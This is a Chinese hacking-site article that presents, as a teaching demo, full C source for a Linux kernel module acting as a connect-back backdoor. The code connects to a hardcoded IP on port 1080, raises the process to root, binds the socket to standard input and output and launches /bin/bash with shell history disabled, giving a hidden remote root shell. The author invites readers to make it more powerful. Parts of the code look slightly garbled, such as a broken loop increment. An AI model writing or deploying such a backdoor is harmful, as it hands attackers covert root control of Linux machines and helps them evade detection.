首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 专题文章

一个简单的内核后门原型


http://www.gipsky.com/
作者:wzt <wzt#xsec.org>



这是一个在内核模块中实现的反连后门,大家看看这于应用层上的实现有什么不同吧,呵呵

/*

* Kernel mode connect backdoor,haha~

*

* just a demo module to teach you how to write a backdoor in kernel mode,

* i belive you can add more code to make it strong and powerful,wulala.

*

* by wzt <wzt#xsec.org>

*

*/



#include <linux/module.h>

#include <linux/kernel.h>

#include <linux/socket.h>

#include <linux/net.h>

#include <linux/in.h>

#include <linux/fs.h>

#include <linux/file.h>

#include <linux/types.h>

#include <linux/errno.h>

#include <linux/string.h>

#include <linux/unistd.h>

#include <net/sock.h>

#include <asm/uaccess.h>

#include <asm/unistd.h>

#include "syscalls.h"



#define REMOTO_IP "192.168.75.1"

#define port 1080



MODULE_LICENSE("GPL");

MODULE_AUTHOR("wzt");



static inline my_syscall2(int, dup2, int, oldfd, int, newfd);



static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };



char *env[]={

"TERM=linux",

"HOME=" HOME,

"PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"

":/usr/local/sbin",

"HISTFILE=/dev/null",

NULL };



int k_connect(void)

{

struct task_struct *tsk = current;

struct socket *sock,*newsock;

struct sockaddr_in server;

int sockfd,i;

int error = 0,len = sizeof(struct sockaddr);



set_fs(KERNEL_DS);



error = sock_create(AF_INET,SOCK_STREAM,0,&sock);

if (error < 0) {

printk("[-] socket_create failed: %d\n",error);

sock_release(sock);

return -1;

}



sockfd = sock_map_fd(sock);

if (sockfd < 0) {

printk("[-] sock_map_fd() failed.\n");

sock_release(sock);

return -1;

}



for (i = 0; i < 8; i )

server.sin_zero[i] = 0;



server.sin_family = PF_INET;

server.sin_addr.s_addr = in_aton(REMOTO_IP);

server.sin_port = htons(port);



error = sock->ops->connect(sock,(struct sockaddr *)&server,len,sock->file->f_flags);

if (error < 0) {

printk("[-] connect to %s failed.\n",REMOTO_IP);

return -1;

}



printk("[ ] connect to %s ok.\n",REMOTO_IP);



set_fs(KERNEL_DS);



tsk->uid = 0;

tsk->euid = 0;

tsk->gid = 0x11111111;

tsk->egid = 0;



dup2(sockfd,0);

dup2(sockfd,1);

dup2(sockfd,2);



execve(earg[0], (const char **) earg, (const char **) env);



return 1;

}



int k_socket_init(void)

{

printk("[ ] kernel socket test start.\n");



k_connect();

}



void k_socket_exit(void)

{

printk("[ ] kernel socket test over.\n");

}



module_init(k_socket_init);

module_exit(k_socket_exit);
<< JAVA \00文件路径截断漏洞与分析for windows并对.NET比较 nop.gs病毒解决方案及nop.gs专杀工具下载 >>
评分
10987654321
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号